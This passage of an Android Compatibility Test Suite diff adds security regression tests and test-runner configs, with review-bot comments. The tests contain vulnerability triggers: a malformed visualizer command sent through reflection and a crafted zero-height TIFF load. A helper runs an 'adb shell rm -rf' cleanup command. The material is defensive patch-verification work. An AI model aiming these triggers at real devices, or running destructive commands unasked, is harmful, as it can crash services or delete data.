+ assertFalse("Device *IS* vulnerable to " + cve,
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ thr.stopLooper();
+ thr.join();
}
}
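Review bot: In `doStagefrightTestMediaMetadataRetriever`, `retriever.release()`, `thr.stopLooper()` and `thr.join()` run only on the straight-line path, so any exception from `setDataSource`, `extractMetadata`, `getEmbeddedPicture` or `getFrameAtTime`, or a failing `assertFalse`, leaves the retriever and the looper thread behind for the next test. Putting the calls that follow the thread start inside `try { ... } finally { retriever.release(); thr.stopLooper(); thr.join(); }` fixes that. The start-up handshake also calls `mpcl.wait()` without a condition, so if the looper thread reaches `mpcl.notify()` before the test thread enters its `synchronized` block the test waits forever; a flag checked in a `while` loop around `wait()` would close that window. The first lines of the hunk belong to `doStagefrightTestMediaCodec`, which starts outside it.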
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
new file mode 100644
index 0000000..807412b
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import junit.framework.TestCase;
+
+import android.content.Context;
+import android.platform.test.annotations.SecurityTest;
+import android.media.audiofx.AudioEffect;
+import android.media.MediaPlayer;
+import android.media.audiofx.Visualizer;
+import android.test.AndroidTestCase;
+import android.test.InstrumentationTestCase;
+import android.util.Log;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Method;
+import java.util.UUID;
+
+public class VisualizerEffectTest extends InstrumentationTestCase {
+ private String TAG = "VisualizerEffectTest";
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ //Testing security bug: 30229821
+ @SecurityTest
+ public void testVisualizer_MalformedConstructor() throws Exception {
+ final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ final int VISUALIZER_CMD_MEASURE = 0x10001;
+
+ AudioEffect.Descriptor[] descriptors = AudioEffect.queryEffects();
+ int i, visualizerIndex = -1;
+ for (i = 0; i < descriptors.length; ++i) {
+ AudioEffect.Descriptor descriptor = descriptors[i];
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) == 0) {
+ visualizerIndex = i;
+
+ AudioEffect ae = null;
+ MediaPlayer mp = null;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), R.raw.good);
+ Constructor ct = AudioEffect.class.getConstructor(UUID.class, UUID.class,
+ int.class, int.class);
+ ae = (AudioEffect) ct.newInstance(descriptors[visualizerIndex].type,
+ descriptors[visualizerIndex].uuid, 0, mp.getAudioSessionId());
+ Method command = AudioEffect.class.getDeclaredMethod("command", int.class,
+ byte[].class, byte[].class);
+ Integer ret = (Integer) command.invoke(ae, new Object[]{VISUALIZER_CMD_MEASURE,
+ new byte[0], new byte[0]});
+ assertTrue("Audio server might have crashed", ret != -7);
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing visualizer");
+ } finally {
+ if (ae != null) {
+ ae.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ }
+ }
+
+ if (visualizerIndex == -1) {
+ Log.w(TAG,"No visualizer found to test");
+ }
+ }
+}
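Review bot: The `catch (Exception e)` in `testVisualizer_MalformedConstructor` logs a fixed string and discards the exception, so a reflection failure (missing constructor or method, or an exception thrown inside `command`) lets the test pass without the malformed `VISUALIZER_CMD_MEASURE` call ever having been checked. Pass the exception to the logger, `Log.w(TAG, "Problem testing visualizer", e);`, or narrow the catch to `NoSuchMethodException` as the AudioEffect tests earlier in this change do. The literal `-7` in the assertion would read better as `AudioEffect.ERROR_DEAD_OBJECT`. The test also passes with only a warning when no visualizer descriptor is found, which deserves a comment saying that this is intended.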
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
new file mode 100644
index 0000000..bbc70a9
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class ZeroHeightTiffTest extends AndroidTestCase {
+ /**
+ * Verifies that the device fails to decode a zero height tiff file.
+ *
+ * Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
+ * With the fix, decoding will fail, without dividing by zero.
+ */
+ @SecurityTest
+ public void test_android_bug_33300701() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ assertNull(bitmap);
+ }
+}
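Review bot: `exploitImage` in `test_android_bug_33300701` is opened with `openRawResource` and never closed, so the raw-resource stream leaks whether or not the decode fails. Wrapping it in try-with-resources fixes this: `try (InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701)) { assertNull(BitmapFactory.decodeStream(exploitImage)); }`, with `throws Exception` added to the method signature because `close()` can throw `IOException`. The bare `assertNull(bitmap)` would also be easier to triage with a message, for example `assertNull("zero-height TIFF must not decode", bitmap)`, since a null result is the only signal this test checks.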
diff --git a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
old mode 100755
new mode 100644
index b896229..3e071b6
--- a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
+++ b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
@@ -25,10 +25,7 @@
import android.content.pm.ServiceInfo;
import android.content.res.Resources;
import android.os.Parcel;
-import android.os.ParcelFileDescriptor;
-import android.support.test.InstrumentationRegistry;
import android.test.AndroidTestCase;
-import android.text.TextUtils;
import android.util.Printer;
import android.view.inputmethod.InputMethod;
import android.view.inputmethod.InputMethodInfo;
@@ -37,10 +34,7 @@
import org.xmlpull.v1.XmlPullParserException;
-import java.io.BufferedReader;
import java.io.IOException;
-import java.io.InputStreamReader;
-import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
@@ -249,11 +243,6 @@
return;
}
- if (!TextUtils.equals("native", getFbeMode())) {
- // Skip the test unless the device is in native FBE mode.
- return;
- }
-
final InputMethodManager imm = mContext.getSystemService(InputMethodManager.class);
final List<InputMethodInfo> imis = imm.getInputMethodList();
boolean hasEncryptionAwareInputMethod = false;
@@ -279,22 +268,4 @@
public void println(String x) {
}
}
-
- private String getFbeMode() {
- try (ParcelFileDescriptor.AutoCloseInputStream in =
- new ParcelFileDescriptor.AutoCloseInputStream(
- InstrumentationRegistry
- .getInstrumentation()
- .getUiAutomation()
- .executeShellCommand("sm get-fbe-mode"))) {
- try (BufferedReader br =
- new BufferedReader(new InputStreamReader(in, StandardCharsets.UTF_8))) {
- // Assume that the output of "sm get-fbe-mode" is always one-line.
- final String line = br.readLine();
- return line != null ? line.trim() : "";
- }
- } catch (IOException e) {
- return "";
- }
- }
}
diff --git a/tools/cts-tradefed/Android.mk b/tools/cts-tradefed/Android.mk
index d0be4ee..304d8d6 100644
--- a/tools/cts-tradefed/Android.mk
+++ b/tools/cts-tradefed/Android.mk
@@ -25,7 +25,7 @@
LOCAL_SUITE_TARGET_ARCH := $(TARGET_ARCH)
LOCAL_SUITE_NAME := CTS
LOCAL_SUITE_FULLNAME := "Compatibility Test Suite"
-LOCAL_SUITE_VERSION := 7.0_r7
+LOCAL_SUITE_VERSION := 7.0_r201704s
LOCAL_MODULE := cts-tradefed
diff --git a/tools/cts-tradefed/res/config/cts-dev.xml b/tools/cts-tradefed/res/config/cts-dev.xml
new file mode 100644
index 0000000..0cf53ca
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-dev.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Runs CTS with common options set developer workflow: skips most checks">
+
+ <include name="cts" />
+
+ <option name="log-level" value="verbose" />
+ <option name="skip-preconditions" value="true" />
+ <option name="skip-device-info" value="true" />
+
+ <option name="compatibility:plan" value="cts-dev" />
+ <option name="compatibility:skip-all-system-status-check" value="true" />
+ <option name="compatibility:primary-abi-only" value="true" />
+
+</configuration>
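Review bot: The `description` attribute is missing a word: `with common options set developer workflow` should read `Runs CTS with common options set for developer workflow: skips most checks`. Because this config turns on `skip-preconditions`, `skip-device-info` and `compatibility:skip-all-system-status-check`, a short comment above those options would help, for example `<!-- Developer iteration only: precondition, device-info and system status checks are skipped, so results are not comparable with a full cts run. -->`.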
diff --git a/tools/cts-tradefed/res/config/cts-sts.xml b/tools/cts-tradefed/res/config/cts-sts.xml
new file mode 100644
index 0000000..8e4c030
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-sts.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Runs Security Patch test cases">
+
+ <option name="plan" value="cts-sts" />
+
+ <include name="cts"/>
+
+ <option name="compatibility:include-filter" value="CtsSecurityTestCases" />
+
+ <option name="compatibility:include-filter" value="CtsSecurityHostTestCases" />
+
+ <!-- Only run tests with @SecurityTest annotation. -->
+ <option name="compatibility:module-arg" value="CtsSecurityHostTestCases:include-annotation:android.platform.test.annotations.SecurityTest"/>
+
+ <option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:include-annotation:android.platform.test.annotations.SecurityTest" />
+
+</configuration>
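Review bot: The plan is set here as an unqualified `plan` option placed before `<include name="cts"/>`, whereas cts-dev.xml in this same change sets `compatibility:plan` after the include. If the included cts config assigns its own plan value, the later assignment may win and this run would not be labelled cts-sts; that depends on the included file, which is not shown here. Moving the line below the include and writing it as `<option name="compatibility:plan" value="cts-sts" />` would match cts-dev.xml. The comment `Only run tests with @SecurityTest annotation` also sits above a module-arg that names only CtsSecurityHostTestCases, so it would be clearer to give each of the two annotation filter lines its own comment.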
diff --git a/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java b/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
index 6385139..2463f87 100644
--- a/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
+++ b/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
@@ -48,7 +48,7 @@
@Option(name="branch", description="build branch name to supply.")
private String mBranch = null;
- public static final String CTS_BUILD_VERSION = "7.0_r3";
+ public static final String CTS_BUILD_VERSION = "7.0_r201701s";
public static final String CTS_PACKAGE = "com.android.cts.tradefed.testtype";
/**
diff --git a/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java b/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
index 6ab175f..9233a4a 100644
--- a/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
+++ b/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
@@ -43,7 +43,6 @@
// Delete earlier report logs if present on device.
String command = String.format("adb -s %s shell rm -rf %s", device.getSerialNumber(),
SRC_DIR);
- CLog.e(command);
if (device.doesFileExist(SRC_DIR)) {
Process process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c",
command});